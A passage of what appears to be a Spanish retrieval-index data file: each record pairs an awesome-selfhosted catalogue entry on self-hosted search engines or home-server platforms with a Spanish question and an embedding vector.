-0.02857, -0.1496, 0.0982, -0.05564, 0.03275, -0.01972, 0.04154, -0.01918, 0.07151, 0.0101, -0.03544, -0.21418, -0.10444, -0.08218, -0.03028, 0.04245, 0.02605, 0.01509, -0.19772, 0.06449, -0.01629, 0.06442, -0.03701, 0.04184, -0.10864, 0.00673, 0.02791, -0.03308, 0.03839, -0.11672, 0.02898, -0.0907, -0.15957, 0.12399, -0.01071, -0.0061, -0.0451, -0.06761, -0.0433, -0.05567, 0.01207, -0.02518, -0.0484, -0.00728, 0.05507, -0.09218, 0.10509, -0.00772, 0.02238, -0.00781, -0.05106, 0.06192, -0.02268, 0.10768, -0.0387, 0.01357, 0.17074, 0.05744, -0.07098, -0.03252, -0.01861, -0.00186, -0.01079, -0.05402, 0.07603, 0.02447, 0.14851, 0.05905, 0.03646, 0.09401, -0.03886, -0.06666, -0.08715, 0.09505, -0.04985, 0.09092, 0.08213, -0.1213, 0.00657, -0.05299, 0.09735, 0.09093, -0.07792, -0.03535, -0.01296, 0.06719, 0.04286, 0.11201, -0.0133, 0.01871, -0.01699, 0.0149, -0.05045, 0.14386, 0.05901, 0.00455, 0.09047, -0.02526, -0.00233, -0.02174, 0.00794, -0.05084, -0.10248, -0.00235, -0.01814, -0.05604, -0.08832, -0.0539, -0.02474, -0.05806, -0.00906, 0.0434, 0.11111, 0.06756, -0.02188, -0.04868, 0.04363, 0.03786, -0.08669, 0.05122, 0.05794, -0.04624, -0.03745, -0.04758, 0.04967, 0.03653, -0.13086, -0.0085, 0.05668, -0.01725, 0.11111, -0.05384, -0.04265, -0.0586, -0.02021, -0.03776, -0.03086, -0.02687, -0.01808, -0.04543, 0.00097, 0.02172, 0.13151, 0.07384, -0.03671, -0.00124, 0.04536, -0.02709, 0.07874, -0.01067, -0.0624, 0.06635, -0.09298, 0.07474, 0.05096, 0.0603, 0.01962, -0.02065, 0.00355, 0.04287, -0.02171, 0.02067, 0.05022, -0.083, 0.10819, 0.0691, -0.06211, -0.03421, -0.03756, 0.02634, 0.01072, -0.02523, -0.03608, 0.00332, -0.00201, -0.00924, 0.0408, -0.03563, -0.03242, -0.0313, -0.02635, 0.06892, 0.05371, -0.01745, 0.07132, -0.05192, -0.08195, 0.06057, 0.03409, -0.0536, -0.05688, 0.07611, -0.09932, 0.0781, 0.01419, -0.00723, -0.02422, -0.01894, 0.03555, -0.01968, -0.02148, -0.01143, 0.01608, -0.04464, -0.07756, -0.01571, 0.03513, -0.01411, 0.00168, 0.03149, 0.01437, 0.04667, 0.04503, -0.00718, -0.03603, 0.02762, 0.02306, -0.06396, 0.00113, 0.04583, -0.00507, 0.0476, -0.04753, 0.00779, 0.02459, 0.00496, -0.03058, 0.0149, -0.02522, -0.02384, 0.03207, -0.00398, -0.01818, -0.00554, 0.02075, -0.05271, -0.0255, 0.05083, 0.00721, -0.02941, -0.00084, -0.01206, -0.04166, -0.0832, -0.00774, -0.02915]} -{"tipo": "pregunta", "herramienta": "Search Engines", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Search Engines", "tema": "search engines", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Search Engines: MeiliSearch β€” Ultra relevant, instant and typo-tolerant full-text search API [MIT, Rust/Docker/deb]. Meme Search β€” AI-powered meme search engine. Automatically extracts descriptions from images using vision-language models, then indexes with vector embeddings for semantic and keyword search [Apache-2.0, Docker]. OpenSearch β€” Distributed and RESTful search engine [Apache-2.0, Java/Docker/K8S/deb]. SearXNG β€” Internet metasearch engine which aggregates results from various search services and databases (Fork of Searx) [⚠, AGPL-3.0, Python/Docker]. Sosse β€” Selenium based search engine and crawler with offline archiving [AGPL-3.0, Python/Docker]. Typesense β€” Blazing fast, typo-tolerant open source search engine optimized for developer happiness and ease of use [GPL-3.0, C++/Docker/K8S/deb]. Websurfx β€” Aggregate results from other search engines (metasearch engine) without ads while keeping privacy and security in mind. It is extremely fast and provides a high level of customization (alternative to SearX) [⚠, AGPL-3.0, Rust/Docker].", "indexar": "cual es una alternativa libre a los buscadores tradicionales que agregue resultados de varias fuentes?", "v": [0.09596, 0.03493, -0.03838, 0.03093, -0.04136, 0.0794, 0.13719, -0.08669, -0.10176, -0.09051, 0.00035, -0.04957, -0.12096, -0.0053, 0.19656, -0.05821, 0.03557, -0.0722, 0.09114, 0.03285, 0.00083, -0.07026, -0.06709, -0.12334, -0.10499, -0.18402, 0.0185, 0.01115, -0.01402, 0.00346, -0.01403, 0.02398, 0.05385, -0.02901, -0.10487, -0.0514, 0.01198, 0.03457, -0.03965, -0.10481, -0.00538, -0.16859, -0.19384, -0.03517, -0.07154, -0.11155, -0.1336, 0.07077, -0.00421, -0.01833, -0.06265, 0.03159, -0.12718, -0.00719, 0.01118, -0.02415, 0.10236, -0.0687, -0.04453, -0.04837, -0.06124, 0.03581, 0.06974, -0.06793, 0.05129, 0.06909, 0.11689, -0.00655, -0.00953, -0.0499, 0.0115, 0.05254, -0.04025, -0.05036, -0.08009, 0.11923, 0.0351, 0.10022, -0.04363, 0.04074, 0.04301, -0.09998, -0.05171, 0.02272, -0.12605, -0.13371, 0.11005, -0.18184, -0.02052, -0.06627, 0.06337, 0.06999, -0.01805, 0.07747, -0.09847, -0.11478, 0.02857, 0.00798, 0.04456, 0.06637, 0.01049, 0.03012, -0.06883, 0.00374, 0.06024, -0.07354, 0.01771, -0.03384, -0.04557, -0.01114, -0.051, -0.0419, 0.03029, 0.03281, -0.03858, 0.01974, -0.06931, -0.00379, 0.00217, -0.05089, -0.04429, 0.05941, -0.03172, 0.00124, -0.04057, -0.00713, 0.04052, -0.02386, 0.03839, -0.00964, 0.05398, -0.00953, -0.03067, -0.07387, -0.05279, -0.07578, 0.04926, -0.04973, 0.07058, 0.01876, 0.01134, 0.01853, 0.05364, -0.09149, 0.10881, -0.02259, 0.06234, -0.03607, -0.06926, -0.04075, -0.11408, -0.02884, 0.03547, 0.05724, -0.10294, 0.03503, -0.05413, -0.02007, -0.07949, 0.11285, 0.05647, 0.01401, -0.04768, -0.00455, 0.01451, 0.00581, -0.06918, -0.0814, 0.03473, -0.01175, -0.04567, 0.03565, -0.0393, -0.11574, 0.03524, -0.00376, -0.05117, -0.10427, 0.05456, 0.00197, -0.04929, 0.07327, -0.11132, -0.02855, 0.01735, -0.09045, 0.03091, 0.00382, -0.02303, -0.02441, 0.00762, 0.00751, -0.09787, -0.04868, -0.00441, -0.01628, -0.00253, -0.02696, 8e-05, -0.04887, -0.056, 0.01295, -0.06079, -0.05052, -0.00967, 0.0079, -0.04724, -0.00705, 0.00187, 0.03187, 0.00457, -0.01413, 0.04419, -0.04185, -0.07949, -0.01828, 0.00289, -0.0981, 0.02459, 0.01127, 0.05744, 0.03136, 0.04333, -0.0095, -0.00887, -0.01513, 0.0684, 0.00028, -0.01298, 0.03042, -0.01796, -0.02164, -0.07884, -0.0416, 0.0402, 0.02508, 0.02258, -0.0115, -0.02783, -0.03081, 0.05637, 0.0294, -0.02297, 0.02116, -0.05792, -0.0647, -0.11902, -0.00905, 0.02886, -0.06358, -0.02485, 0.07532, 0.08477, -0.02192, 0.05118, -0.10238]} -{"tipo": "pregunta", "herramienta": "Search Engines", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Search Engines", "tema": "search engines", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Search Engines: Yacy β€” Peer based, decentralized search engine server [GPL-2.0, Java/Docker/K8S]. ZincSearch β€” Search engine that requires minimal resources (alternative to Elasticsearch) [Apache-2.0, Go/Docker/K8S].", "indexar": "quΓ© servidor de bΓΊsqueda descentralizado puedo instalar en mi propio hosting?", "v": [-0.07897, 0.11682, -0.191, -0.17665, -0.03763, -0.12475, -0.0027, -0.13762, -0.07246, -0.09034, -0.11233, -0.00922, -0.01715, -0.07835, 0.05107, 0.02984, 0.19022, -0.12018, 0.05882, 0.02, -0.03272, -0.03966, 0.00045, -0.00033, -0.03676, 0.00931, 0.02471, -0.04461, -0.13609, -0.1028, 0.02852, -0.02736, -0.02511, 0.07389, -0.0427, -0.12087, 0.00676, 0.11119, -0.06036, -0.0017, 0.0527, 0.02928, -0.03531, 0.05877, 0.01156, -0.09816, 0.10361, -0.20609, 0.03808, -0.0952, -0.11078, -0.11845, -0.09452, -0.05632, 0.0468, -0.04738, 0.05628, -0.12292, 0.13058, -0.04496, -0.17777, 0.04412, 0.00536, 0.02388, 0.09921, 0.02366, -0.05029, 0.03334, -0.10416, -0.02072, -0.10175, -0.00498, 0.00311, -0.10518, 0.05718, 0.1019, 0.0139, -0.07206, 0.13319, -0.00306, 0.05038, 0.02107, -0.01977, 0.07113, -0.10055, -0.04835, 0.00211, -0.04178, 0.07484, 0.02014, 0.04981, -0.03767, -0.07768, 0.07195, -0.02939, -0.09405, 0.13388, -0.02935, 0.00268, 0.06135, 0.05177, 0.01299, 0.05629, 0.09439, 0.04119, -0.04542, 0.15235, -0.10357, 0.01304, -0.08317, 0.01351, 0.02755, -0.04832, -0.0119, -0.03856, -0.03458, -0.01195, 0.0143, 0.04211, 0.04595, -0.09548, -0.0265, 0.03695, 0.05582, 0.02421, -0.05765, 0.08044, 0.00823, 0.04397, 0.02175, 0.03992, -0.07558, -0.01828, -0.03884, -0.0092, 0.00295, 0.01733, -0.06132, -0.01775, -0.00515, -0.01071, 0.00017, -0.02349, -0.06557, 0.10704, 0.0244, 0.08502, -0.03419, -0.04376, -0.01566, -0.01105, -0.03816, 0.00392, 0.00858, -0.11556, -0.0006, 0.05737, -0.11114, 0.02064, 0.03465, 0.03144, 0.05384, -0.01135, 0.04065, 0.01194, 0.0403, -0.03028, -0.01052, 0.04925, 0.09237, -0.07873, 0.04233, -0.05586, -0.07093, 0.07576, -0.00577, -0.03344, -0.08717, 0.04742, 0.01637, -0.01075, 0.06711, -0.0431, 0.02284, -0.01239, -0.02053, -0.02213, -0.00483, 0.01519, -0.03353, 0.04255, -0.04676, -0.08454, 0.0597, 0.01648, -0.07022, -0.06235, -0.03761, -0.04865, -0.04555, -0.05105, 0.00723, -0.03821, -0.01306, 0.00042, -0.04374, -0.0828, 0.05228, -0.00461, 0.03309, 0.00868, 0.0175, 0.0997, -0.05863, -0.0252, -0.005, 0.04509, -0.07335, 0.00941, -0.00918, -0.00083, 0.02615, 0.03511, -0.01445, 0.00187, -0.02978, 0.02736, -0.01753, 0.06065, 0.03833, -0.05626, 0.05347, -0.03105, -0.02462, 0.03333, -0.00452, 0.04129, -0.03127, 0.00186, -0.02396, 0.03598, 0.08765, -0.03499, -0.0746, -0.00953, -0.0705, -0.00557, 0.00927, -0.05209, -0.02726, -0.02802, -0.04262, 0.03201, -0.05227, 0.02765, -0.01783]} -{"tipo": "pregunta", "herramienta": "Search Engines", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Search Engines", "tema": "search engines", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Search Engines: Yacy β€” Peer based, decentralized search engine server [GPL-2.0, Java/Docker/K8S]. ZincSearch β€” Search engine that requires minimal resources (alternative to Elasticsearch) [Apache-2.0, Go/Docker/K8S].", "indexar": "quΓ© alternativa libre a Elasticsearch requiere menos recursos?", "v": [-0.24566, 0.06342, -0.12747, -0.11415, 0.02866, 0.00344, -0.06318, -0.0932, -0.14759, -0.04034, -0.09376, -0.11756, -0.04321, 0.02487, 0.17484, -0.08691, 0.03803, -0.00445, 0.08237, -0.06239, -0.11564, -0.12752, -0.17916, -0.04568, -0.0502, -0.03179, -0.11692, -0.01409, 0.00671, 0.03495, 0.00712, 0.0477, 0.02453, -0.05354, -0.08186, 0.20103, 0.16909, 0.00334, 0.05105, -0.11315, 0.08753, -0.00359, -0.01876, -0.04266, -0.0334, -0.07539, -0.07974, 0.06932, -0.074, 0.08453, -0.10224, -0.03119, -0.08385, 0.0686, 0.14102, 0.01234, 0.08835, -0.19543, -0.08577, -0.0271, -0.14394, -0.00127, -0.00153, -0.02326, 0.02851, 0.02742, 0.03575, 0.0483, -0.07188, 0.02333, -0.00154, -0.07804, 0.02677, -0.02203, -0.03419, 0.06377, 0.10677, 0.00063, 0.04586, 0.06362, -0.00787, 0.02055, 0.038, 0.06529, -0.06919, -0.00719, 0.093, -0.05983, 0.057, 0.01856, 0.02803, -0.03983, -0.05136, 0.08121, -0.02185, -0.08481, 0.01136, 0.06347, -0.0206, 0.04912, 0.01757, -0.04468, -0.05726, -0.02252, 0.02978, -0.04071, 0.00769, 0.02465, -0.13113, 0.10122, -0.01604, -0.00188, 0.03726, 0.05384, -0.00956, 0.0261, -0.04787, 0.00123, 0.03394, -0.07107, 0.00687, 0.02322, -0.05711, -0.04677, -0.0268, -0.04172, 0.113, 0.01772, 0.06873, -0.01612, 0.13257, -0.0272, -0.07638, -0.10722, -0.09994, -0.04308, 0.08546, -0.01903, 0.02025, 0.05527, -0.02335, -0.02783, -0.01244, -0.02139, 0.02433, -0.06126, 0.09012, -0.04136, 0.02116, -0.07052, -0.05069, -0.08613, -0.00486, 0.04203, -0.02473, -0.01842, -0.07058, 0.051, -0.10973, -0.03315, 0.00246, -0.00923, -0.09599, 0.02584, 0.02511, -0.01369, 0.01747, -0.03809, -0.12402, 0.06325, 0.00705, 0.02329, 0.08498, -0.0816, 0.02296, -0.02407, 0.05699, -0.09724, 0.00246, -0.01053, 0.03999, -0.01991, -0.10878, 0.01019, 0.00925, -0.04363, 0.0046, 0.02754, -0.0216, 0.01679, -0.03777, 0.00323, -0.03126, -0.05415, 0.0001, -0.00504, 0.05419, -0.07136, 0.02997, -0.01547, -0.03849, 0.01655, -0.02865, -0.05827, 0.00706, -0.0067, 0.01436, 0.00092, -0.00717, 0.01533, 0.05132, -0.01651, 0.04661, 0.07052, -0.03027, 0.03337, 0.03156, 0.0306, -0.05245, -0.02327, 0.06553, 0.02558, -0.02346, 0.0726, 0.03969, 0.06803, -0.00636, -0.01042, -0.05268, -0.01553, 0.00803, -0.03227, -0.04368, 0.07657, -0.03251, -0.04098, -0.02203, 0.02935, 0.03053, 0.04592, 0.042, -0.01151, -0.08574, 0.01221, -0.01977, 0.03578, -0.05261, -0.00388, -0.01006, -0.01029, -0.01165, 0.01495, -0.05601, 0.0164, 0.01411, -0.02286]} -{"tipo": "pregunta", "herramienta": "Search Engines", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Search Engines", "tema": "search engines", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Search Engines: Yacy β€” Peer based, decentralized search engine server [GPL-2.0, Java/Docker/K8S]. ZincSearch β€” Search engine that requires minimal resources (alternative to Elasticsearch) [Apache-2.0, Go/Docker/K8S].", "indexar": "cΓ³mo montar un motor de bΓΊsqueda basado en pares peer-to-peer?", "v": [0.13462, 0.01445, -0.10623, -0.12052, -0.16414, 0.03715, 0.13392, -0.04534, -0.12734, -0.20839, 0.05108, 0.20843, 0.08996, -0.08488, 0.02009, -0.06481, -0.07529, 0.05321, 0.16355, -0.01026, -0.0251, 0.06376, -0.06635, -0.14966, -0.02912, 0.16506, 0.00766, -0.08083, -0.12409, 0.06466, -0.04829, 0.09832, -0.01117, 0.02285, -0.19036, -0.1476, 0.01638, -0.027, -0.00229, -0.02178, -0.15383, 0.0454, -0.03342, -0.00777, -0.08542, 0.05738, -0.04272, -0.02951, 0.06879, 0.03259, 0.03945, 0.06536, -0.07623, 0.05688, -0.04956, -0.03436, 0.18615, 0.02904, 0.03043, -0.1955, -0.1091, 0.04175, 0.00797, 0.01791, -0.02175, -0.04535, 0.09595, 0.02227, -0.07676, 0.03527, -0.04377, -0.02694, -0.02766, -0.00868, -0.00251, 0.08855, 0.11414, -0.04515, 0.02514, 0.03883, 0.11026, 0.00905, -0.03837, 0.13883, -0.00871, 0.09181, 0.16152, -0.0501, -0.04155, -0.01533, 0.03992, 0.10185, 0.01374, 0.02058, -0.0751, -0.06706, -0.0251, 0.01508, -0.08473, -0.01212, -0.01229, -0.0334, 0.00294, 0.06328, 0.04045, 0.02663, 0.06779, 0.06213, -0.05783, -0.03654, 0.04853, 0.08769, -0.04888, -0.00096, -0.09151, -0.06736, -0.0507, 0.01704, -0.00423, -0.0753, -0.0412, 0.02781, 0.00866, 0.06051, 0.00108, 0.00643, 0.14124, 0.10482, -0.02194, -0.00173, 0.10365, 0.05002, -0.03275, -0.04432, -0.03605, 0.02012, -0.00981, 0.04055, 0.01808, -0.0262, 0.0845, -0.02899, 0.04133, -0.04591, 0.03755, 0.01422, 0.07919, -0.07478, -0.02065, -0.01173, 0.0098, 0.00627, 0.01711, -0.02579, -0.10424, -0.02758, -0.03802, -0.0208, 0.00253, 0.00838, 0.05146, 0.01255, -0.02138, -0.09508, 0.05721, 0.08586, 0.01812, -0.02802, -0.0095, -0.02824, -0.01174, 0.01245, -0.03531, 0.01406, 0.06721, 0.06729, 0.00054, -0.02826, -0.03797, 0.01723, -0.02708, -0.03202, -0.02209, 0.04958, -0.03177, 0.01912, 0.09533, 0.05063, -0.01302, -0.00276, 0.01554, -0.02458, -0.03241, -0.01673, 0.05595, -0.05545, -0.03473, 0.03654, 0.08078, 0.03842, -0.02303, -0.02417, 0.00875, -0.04298, -0.03088, -0.0115, 0.03839, -0.02953, -0.00456, -0.00467, -0.0104, -0.04595, -0.0164, 0.00366, -0.08035, -0.0076, -0.08175, -0.05256, 0.00671, 0.03293, -0.06241, -0.00176, 0.02716, -0.0167, 0.02469, 0.02424, 0.01303, -0.01106, -0.04113, -0.00799, 0.02243, -0.02915, -0.04232, -0.00171, 0.01359, 0.01913, -0.01098, 0.02434, -0.03239, 0.02971, 0.04662, -0.03205, 0.01583, -0.01909, 0.03625, 0.01759, -0.02037, 0.05653, 0.02827, -0.02066, -0.03486, -0.02518, -0.04058, -0.03408, 0.0157, -0.01473]} -{"tipo": "pregunta", "herramienta": "Self-hosting Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Self-hosting Solutions", "tema": "self-hosting solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Self-hosting Solutions: DietPi β€” Minimal Debian OS optimized for single-board computers, which allows you to easily install and manage several services for selfhosting at home [GPL-2.0, Shell]. DockSTARTer β€” DockSTARTer helps you get started with home server apps running in Docker [MIT, Shell]. Dropserver β€” An application platform for your personal web services [Apache-2.0, Go/Deno]. FreedomBox β€” Community project to develop, design and promote personal servers running free software for private, personal, communications [AGPL-3.0, Python/deb]. HomelabOS β€” Offline privacy-centric data-center. Deploy over 100 services with a few commands [MIT, Docker]. HomeServerHQ β€” All-in-one home server infrastructure and installer. Have a fully configured email server, VPN, and public website(s) set up in less than an hour, even behind CGNAT [GPL-3.0, Shell]. LibreServer β€” Home server configuration based on Debian [AGPL-3.0, Shell].", "indexar": "quΓ© sistema operativo mΓ­nimo es el mejor para instalar servicios en una placa ΓΊnica?", "v": [-0.01759, 0.15369, -0.22834, -0.12826, -0.00184, -0.18536, -0.0233, -0.12039, -0.19447, -0.01229, -0.13063, -0.12506, 0.04711, -0.05075, 0.11507, -0.12401, 0.00375, -0.21273, 0.08948, -0.06658, -0.18593, -0.03176, -0.06523, 0.01024, -0.08982, 0.08206, -0.02122, -0.12792, -0.20724, -0.02719, 0.03797, -0.0068, 0.01939, -0.11761, -0.02303, -0.00983, 0.02668, 0.01305, 0.14788, -0.0035, 0.00908, 0.01473, 0.10706, 0.07719, 0.12172, -0.05583, 0.12496, -0.01883, 0.08292, -0.05012, -0.05093, -0.05825, -0.09252, -0.08879, 0.00524, -0.10089, 0.04156, -0.05553, 0.0111, -0.01476, -0.03792, 0.08003, -0.07709, -0.00076, 0.11863, 0.06711, -0.01478, 0.01922, 0.09394, 0.07469, -0.03839, 0.01186, 0.05243, 0.01538, 0.0307, 0.10934, 0.00717, 0.00027, 0.08973, 0.00792, 0.11706, 0.02155, -0.09383, 0.01335, -0.0109, -0.02087, -0.00673, -0.02515, -0.05352, -0.03961, 0.0725, -0.0049, -0.00206, 0.04308, 0.0458, -0.05098, 0.06435, 0.00596, 0.02286, -0.0321, -0.00258, -0.07062, -0.04777, 0.0914, -0.03996, -0.09338, 0.0849, -0.03186, -0.00488, -0.11949, -0.04113, 0.00972, -0.00969, 0.04375, -0.05003, -0.01321, -0.04014, -0.04509, -0.07121, -0.00159, -0.06626, 0.03951, -0.01474, 0.02863, 0.09059, -0.03199, -0.03928, 0.03269, 0.05702, 0.0555, 0.03506, -0.08369, -0.01508, -0.02285, -0.07611, 0.02175, 0.06314, 0.0035, 0.02308, 0.00504, 0.03815, 0.04875, 0.01811, -0.07588, 0.05594, 0.04204, 0.06195, -0.03469, 0.01639, -0.01086, 0.03946, 0.03652, -0.02927, -0.01803, -0.06749, -0.01667, 0.0396, -0.06972, 0.0427, -0.04631, 0.0412, -0.06191, 0.05232, 0.04481, -0.05949, 0.01601, -0.03368, -0.02396, 0.08892, 0.04272, -0.00516, 0.08433, 0.06353, -0.0748, 0.03444, 0.03832, -0.01638, -0.04796, 0.04994, 0.05495, -0.03862, 0.08006, 0.06628, 0.01947, -0.01351, 0.00275, -0.01481, 0.00825, 0.05429, -0.05266, 0.07284, 0.01493, -0.03365, 0.01232, -0.00723, -0.03127, -0.03599, -0.06772, -0.02073, 0.01693, -0.06479, 0.05748, -0.02937, -0.10653, 0.03978, 0.02914, 0.04478, 0.02082, 0.0059, 0.08643, -0.0104, 0.03493, 0.00925, -0.05161, -0.04755, 0.05614, -0.0257, 0.03409, 0.03835, -0.02992, 0.02991, -0.0419, 0.00543, -0.00066, -0.0468, -0.05922, -0.02024, 0.00649, 0.00569, -0.0033, 0.02386, -0.03822, 0.04196, -0.00166, 0.02453, -0.02945, -0.02282, -0.01313, -0.02895, -0.03112, 0.03054, 0.06916, 0.02139, -0.08755, -0.01805, -0.00636, -0.00969, 0.00434, -0.02777, -0.09255, -0.01997, 0.0262, 0.043, -0.01027, 0.01158, 0.00562]} -{"tipo": "pregunta", "herramienta": "Self-hosting Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Self-hosting Solutions", "tema": "self-hosting solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Self-hosting Solutions: DietPi β€” Minimal Debian OS optimized for single-board computers, which allows you to easily install and manage several services for selfhosting at home [GPL-2.0, Shell]. DockSTARTer β€” DockSTARTer helps you get started with home server apps running in Docker [MIT, Shell]. Dropserver β€” An application platform for your personal web services [Apache-2.0, Go/Deno]. FreedomBox β€” Community project to develop, design and promote personal servers running free software for private, personal, communications [AGPL-3.0, Python/deb]. HomelabOS β€” Offline privacy-centric data-center. Deploy over 100 services with a few commands [MIT, Docker]. HomeServerHQ β€” All-in-one home server infrastructure and installer. Have a fully configured email server, VPN, and public website(s) set up in less than an hour, even behind CGNAT [GPL-3.0, Shell]. LibreServer β€” Home server configuration based on Debian [AGPL-3.0, Shell].", "indexar": "con quΓ© puedo montar un servidor de casa usando Docker fΓ‘cilmente?", "v": [-0.06347, 0.0954, -0.19565, -0.00314, -0.20527, -0.01331, 0.02673, 0.01211, -0.03409, -0.13561, -0.16096, -0.04322, 0.00859, -0.15578, -0.004, 0.00598, 0.22583, -0.09468, 0.02069, 0.02788, 0.03102, -0.02305, -0.01391, -0.07521, -0.0169, 0.01805, 0.08497, -0.09324, -0.11947, 0.00861, 0.02684, 0.0277, 0.04049, 0.04152, -0.03046, -0.09863, 0.00741, 0.05898, 0.05951, 0.04314, 0.09089, 0.04366, -0.11278, 0.00409, -0.01648, 0.03505, 0.06601, -0.16479, 0.00841, -0.03773, -0.02121, -0.08922, -0.09545, 0.02564, -0.08807, 0.03821, 0.10032, -0.1375, 0.17831, 0.01451, -0.11191, 0.04096, 0.01402, 0.06086, 0.06685, -0.06237, -0.06201, -0.00285, -0.01891, -0.10488, -0.0698, 0.00169, 0.04095, 0.00521, 0.0281, 0.09761, -0.00223, -0.05433, 0.08668, 0.071, -0.00172, -0.0177, -0.0899, 0.14246, 0.00191, -0.05628, -0.01153, -0.09855, 0.10136, -0.0312, 0.08603, 0.08366, 0.00326, 0.06896, 0.04176, -0.12585, 0.15038, 0.09269, -0.00664, -0.00995, 0.05255, 0.0525, -0.00372, 0.15686, 0.04728, 0.02539, 0.1101, -0.05231, -0.00206, -0.09833, -0.02265, 0.04482, -0.15581, 0.00206, -0.0613, -0.08624, -0.03553, 0.01034, 0.00649, 0.01398, -0.04008, 0.02377, 0.07067, 0.04122, -0.02624, -0.1426, 0.1776, 0.04643, -0.04289, -0.00398, -0.03228, -0.06853, -0.05803, -0.0158, 0.00773, 0.09004, 0.01166, -0.11489, -0.07375, -0.05421, 0.05685, 0.01277, -0.00641, -0.03298, 0.09189, 0.03777, 0.05666, -0.07097, -0.08401, 0.06724, 0.04941, 0.04675, -0.03282, -0.01799, -0.05466, -0.05756, 0.03877, -0.05792, -0.01562, 0.0528, -0.02788, 0.06398, -0.00655, -0.00125, -0.05014, 0.0281, 0.03571, 0.04648, 0.006, 0.03065, -0.05788, 0.04438, -0.02505, 0.00532, 0.02115, -0.02294, -0.02729, -0.01217, -0.06856, -0.01253, -0.0047, -0.00716, -0.02576, 0.01696, -0.04887, -0.01867, 0.02394, 0.02231, -0.00854, -0.01187, -0.05578, 0.02208, -0.0132, 0.03949, 0.0511, -0.09322, -0.01772, -0.05315, 0.03933, -0.0119, -0.04506, -0.05731, 0.02048, 0.02793, 0.02613, -0.00485, -0.05949, 0.0557, 0.03354, 0.04832, -0.02463, -0.0249, 0.08122, -0.02419, -0.02109, 0.07178, 0.02704, -0.03727, 0.00431, 0.0143, 0.05589, 0.04333, -0.00648, -0.00676, 0.03527, 0.0483, -0.00826, -0.04482, 0.04125, 0.03227, -0.02042, -0.0178, -0.00937, 0.00725, 0.01605, -0.03027, 0.01586, -0.01261, -0.01529, -0.02122, 0.02284, 0.0682, -0.00475, -0.01852, 0.00053, -0.03759, -0.02042, 0.01195, -0.00395, -0.01722, -0.0081, -0.02191, -0.00139, -0.02151, -0.03949, -0.01217]} -{"tipo": "pregunta", "herramienta": "Self-hosting Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Self-hosting Solutions", "tema": "self-hosting solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Self-hosting Solutions: DietPi β€” Minimal Debian OS optimized for single-board computers, which allows you to easily install and manage several services for selfhosting at home [GPL-2.0, Shell]. DockSTARTer β€” DockSTARTer helps you get started with home server apps running in Docker [MIT, Shell]. Dropserver β€” An application platform for your personal web services [Apache-2.0, Go/Deno]. FreedomBox β€” Community project to develop, design and promote personal servers running free software for private, personal, communications [AGPL-3.0, Python/deb]. HomelabOS β€” Offline privacy-centric data-center. Deploy over 100 services with a few commands [MIT, Docker]. HomeServerHQ β€” All-in-one home server infrastructure and installer. Have a fully configured email server, VPN, and public website(s) set up in less than an hour, even behind CGNAT [GPL-3.0, Shell]. LibreServer β€” Home server configuration based on Debian [AGPL-3.0, Shell].", "indexar": "cuΓ‘l es una alternativa libre a HomeServerHQ para gestionar mis comunicaciones privadas?", "v": [0.00556, 0.03874, 0.06141, -0.2133, -0.01841, -0.18736, -0.00204, -0.05363, -0.15863, -0.04103, -0.06182, -0.07764, 0.05933, 0.02899, 0.09994, -0.0081, 0.18754, -0.09105, 0.01365, 0.02022, -0.09068, 0.17657, 0.00024, -0.0826, -0.1576, -0.15279, 0.08057, -0.0254, -0.10123, -0.06405, 0.05421, -0.07081, 0.00163, 0.04485, -0.01248, 0.1107, 0.00727, 0.10602, 0.0649, -0.0574, 0.05605, -0.01755, -0.02474, 0.0652, 0.08613, -0.07877, -0.01208, -0.09148, -0.00239, 0.04204, -0.13212, -0.06375, -0.13324, -0.007, 0.07844, -0.04594, 0.10299, -0.08766, 0.04638, -0.09259, -0.07436, 0.04611, 0.09836, 0.05508, 0.02885, 0.03962, -0.07385, -0.05784, -0.15696, 0.13686, 0.01933, -0.01184, 0.07976, 0.0376, 0.0036, -0.02424, 0.00782, 0.05492, 0.05714, 0.03602, 0.07161, -0.04187, -0.05556, 0.02096, -0.03092, -0.09003, 0.04024, -0.0779, -0.00976, 0.00467, 0.04394, -0.02089, -0.11096, -0.00422, -0.03984, -0.04668, -0.03429, -0.06577, -0.06786, -0.00568, 0.00773, 0.10735, -0.13107, 0.0163, -0.03359, 0.07008, 0.0027, -0.07301, -0.03595, -0.03343, -0.0423, 0.06218, 0.04314, 0.08005, -0.04318, 0.03683, -0.02913, -0.01485, -0.00599, 0.04425, -0.08728, -0.08996, 0.10659, -0.0598, -0.00205, 0.06609, 0.07551, -0.00349, -0.0179, 0.08887, -0.04956, -0.09993, -0.01702, -0.01401, -0.05149, 0.01984, -0.02168, -0.02607, 0.09298, -0.05577, -0.10138, 0.04527, -0.05696, 0.00103, 0.14049, 0.02081, 0.04086, 0.00546, 0.01065, 0.02808, -0.01489, -0.00281, -0.03228, 0.0363, -0.0584, 0.04672, -0.08194, -0.05995, -0.09193, 0.1535, 0.02096, 0.02029, -0.02706, 0.03526, 0.00174, -0.03959, -0.00204, 0.03805, -0.0495, 0.02139, 0.0036, 0.06921, 0.03329, -0.12849, 0.03363, -0.0924, 0.03023, -0.07992, 0.01122, -0.05269, 0.04298, 0.02045, -0.06112, -0.00987, 0.01124, 0.01648, -0.00851, 0.06261, -0.02696, 0.04464, -0.04899, 0.0474, -0.05868, -0.04765, 0.034, -0.01288, -0.06452, 